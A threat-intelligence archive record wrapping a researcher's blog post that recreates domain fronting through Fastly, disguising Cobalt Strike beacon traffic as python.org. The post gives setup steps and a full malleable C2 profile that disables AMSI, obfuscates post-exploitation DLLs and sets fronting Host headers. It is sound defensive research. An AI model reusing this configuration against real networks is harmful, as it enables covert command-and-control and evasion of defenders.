{
	"id": "5190edf9-2408-4976-ac1b-80dde0bf488a",
	"created_at": "2026-04-06T00:22:20.514225Z",
	"updated_at": "2026-04-10T13:13:03.057294Z",
	"deleted_at": null,
	"sha1_hash": "84e3683bde752083d9f94d725881d0bfb355cef8",
	"title": "Threat Spotlight - Domain Fronting",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 447582,
	"plain_text": "Threat Spotlight - Domain Fronting\r\nBy Still Hsu\r\nPublished: 2021-11-12 · Archived: 2026-04-02 11:35:30 UTC\r\nDomain fronting is a common technique that is sometimes used by threat actors to disguise their traffic as the real\r\ndeal. Essentially, what it is is communicate with legitimate-looking domains when reality, the traffic is being\r\npointed to threat actor’s C2 stations. A common example would be using legitimate or reputable domains with a\r\ncustom Host header to redirect the traffic to threat actor’s stations. There are many examples out there that abuse\r\nservices like Cloudflare, CloudFront, and such.\r\nIn today’s example, we’ll be using Fastly as an example. Fastly provides a service that’s more or less intended to\r\nact as a CDN, where you can create a service and tie it to your backend. As you can imagine, a company as large\r\nas Fastly (that was able to bring half the Internet with it when it went down), there are probably more than\r\nthousands of people using their services - and indeed there are.\r\nYou can do a quick search using services like RiskIQ to look through all of the subdomains associated with\r\n*.fastly.net . While it appears we’re not the first to discover this, there aren’t a whole lot of other resources out\r\nthere talking about abusing Fastly as a service.\r\nhttps://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/\r\nPage 1 of 7\n\nAnd Python Software Foundation just so happens to use it too!\r\nhttps://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/\r\nPage 2 of 7\n\nWhat actually happens is when you contact python.org , it actually gets interpreted as\r\npython.org.prod.global.fastly.net internally based on the Host header. This was actually brought to our\r\nattention a while back when my colleagues discovered there were CobaltStrike beacons in the wild that appear to\r\nconnect to Python-related domains at execution, and upon further investigation, we realized they were abusing the\r\nnature of Fastly services to disguise their traffic. So I decided to do a little experiment this weekend to see if I can\r\nrecreate that myself.\r\nTo get started, I created a new service on Fastly called dl-python.org , a service name (and in turn, a domain\r\nname) that appears to be similar enough to the real deal, but doesn’t actually exist (and it doesn’t need to be!).\r\nCreate a new service that appears to be genuine enough to the target domain name. In this case, dl-python.org .\r\nNote that while dl-python.org appears to be actually owned by someone else, I don't actually have access to it,\r\nnor will it actually make contact with the domain (we'll get to that part later). You can name it whatever you want.\r\nhttps://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/\r\nPage 3 of 7\n\nNext, in the Host settings section, enter your actual C2’s domain name, something you have actual control over. In\r\nthis case, my-c2domain.com . I have the port set to 55137 , but it should be 443 ideally for HTTPS beacons. My\r\n80/443 port was occupied by something else when I was experimenting with it.\r\nNext, we’re going to craft a new CobaltStrike Stager. Create a new Listener on your team server with the\r\nvulnerable domain name as the C2, and enter your service name in the Host field. To make the traffic look a\r\nlittle bit more genuine, you can also craft your own malleable C2 profile that has contents of Python docs inside.\r\nset sleeptime \"5000\";\r\nset jitter \"0\";\r\nset maxdns \"255\";\r\nset useragent \"Mozilla/5.0 (Windows NT 6.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0\";\r\nhttps://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/\r\nPage 4 of 7\n\n# set host_stage \"false\";\r\npost-ex {\r\n# control the temporary process we spawn to\r\nset spawnto_x86 \"%ProgramFiles(x86)%\\\\Everything\\\\Everything.exe\";\r\nset spawnto_x64 \"%ProgramFiles%\\\\Mozilla Firefox\\\\firefox.exe\";\r\n# change the permissions and content of our post-ex DLLs\r\nset obfuscate \"true\";\r\n# pass key function pointers from Beacon to its child jobs\r\nset smartinject \"true\";\r\n# disable AMSI in powerpick, execute-assembly, and psinject\r\nset amsi_disable \"true\";\r\n}\r\nhttp-config {\r\nset headers \"Date, Server, Content-Length, Keep-Alive, Connection, Content-Type\";\r\nset trust_x_forwarded_for \"false\";\r\nheader \"Server\" \"nginx\";\r\nheader \"Keep-Alive\" \"timeout=5, max=100\";\r\nheader \"Connection\" \"Keep-Alive\";\r\n}\r\nhttp-get {\r\n set uri \"/3/library/stdtypes.html\";\r\n client {\r\n header \"Accept\" \"*/*\";\r\n header \"Host\" \"dl-python.org\";\r\n metadata {\r\n base64;\r\n prepend \"session=\";\r\n header \"Cookie\";\r\n }\r\n }\r\n server {\r\n header \"Server\" \"nginx\";\r\n header \"Cache-Control\" \"max-age=0, no-cache\";\r\n header \"Pragma\" \"no-cache\";\r\n header \"Connection\" \"keep-alive\";\r\n header \"Content-Type\" \"application/javascript; charset=utf-8\";\r\n output {\r\n base64url;\r\n # the content was so long for my IDE that it actually hung when trying to parse it\r\n # so I'm gonna leave this section to you\r\nhttps://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/\r\nPage 5 of 7\n\nappend \"...html_head...\";\r\n prepend \"...html_body...\";\r\n print;\r\n }\r\n }\r\n}\r\nhttp-post {\r\n set uri \"/3/library/struct.html\";\r\n client {\r\n header \"Accept\" \"*/*\";\r\n header \"Host\" \"cobaltstrike.stillu.cc\";\r\n id {\r\n mask;\r\n base64url;\r\n parameter \"x-timer\";\r\n }\r\n output {\r\n mask;\r\n base64url;\r\n parameter \"etag\";\r\n }\r\n }\r\n server {\r\n header \"Server\" \"nginx\";\r\n header \"Cache-Control\" \"max-age=0, no-cache\";\r\n header \"Pragma\" \"no-cache\";\r\n header \"Connection\" \"keep-alive\";\r\n header \"Content-Type\" \"application/javascript; charset=utf-8\";\r\n output {\r\n base64url;\r\n append \"...html_head...\";\r\n prepend \"...html_body...\";\r\n print;\r\n }\r\n }\r\n}\r\nAnd that’s it! Let’s try to run the stager on our victim machine.\r\nhttps://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/\r\nPage 6 of 7\n\nAs you can see, it worked! It looks like it’s contacting docs.python.org (and it is), yet the server returned\r\nbeacon information for the stager. Just not in plaintext because I had the mask option enabled, otherwise the\r\ncontent should look almost like standard HTML content with random bits of information thrown in there because\r\nof the malleable C2 config above - and this is with unencrypted traffic.\r\nThis trick is perfect for threat actors that want to evade IT admins’ attention as\r\nit appears to contact a real domain with benign URL\r\n( http://docs.python.org/3/library/stdtypes.html )\r\nit can be made to communicate in HTTPS, so the Host header wouldn’t even show up\r\nif the IT admin does manage to figure out it goes to dl-python.org.prod.global.fastly.net , it doesn’t\r\nreveal the actual C2 address still, as the resolved IP would just be Fastly’s own CDN IP.\r\nThis entire thing was really fun to recreate and helped me understand CobaltStrike a little bit more from attacker’s\r\nperspective, as I’ve always tackled CobaltStrike payloads from a Blue Team’s perspective as a threat intel\r\nresearcher. If you are in the same position as me, I also encourage you to give CobaltStrike a try and try to attack\r\nyour own machines to see what tricks you can pull off (if your organization has access to such tool).\r\nSource: https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/\r\nhttps://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/"
	],
	"report_names": [
		"domain-fronting-fastly"
	],
	"threat_actors": [
		{
			"id": "67bf0462-41a3-4da5-b876-187e9ef7c375",
			"created_at": "2022-10-25T16:07:23.44832Z",
			"updated_at": "2026-04-10T02:00:04.607111Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"Careto",
				"The Mask",
				"Ugly Face"
			],
			"source_name": "ETDA:Careto",
			"tools": [
				"Careto"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f5bf6853-3f6e-452c-a7b7-8f81c9a27476",
			"created_at": "2023-01-06T13:46:38.677391Z",
			"updated_at": "2026-04-10T02:00:03.064818Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"The Mask",
				"Ugly Face"
			],
			"source_name": "MISPGALAXY:Careto",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434940,
	"ts_updated_at": 1775826783,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/84e3683bde752083d9f94d725881d0bfb355cef8.pdf",
		"text": "https://archive.orkl.eu/84e3683bde752083d9f94d725881d0bfb355cef8.txt",
		"img": "https://archive.orkl.eu/84e3683bde752083d9f94d725881d0bfb355cef8.jpg"
	}
}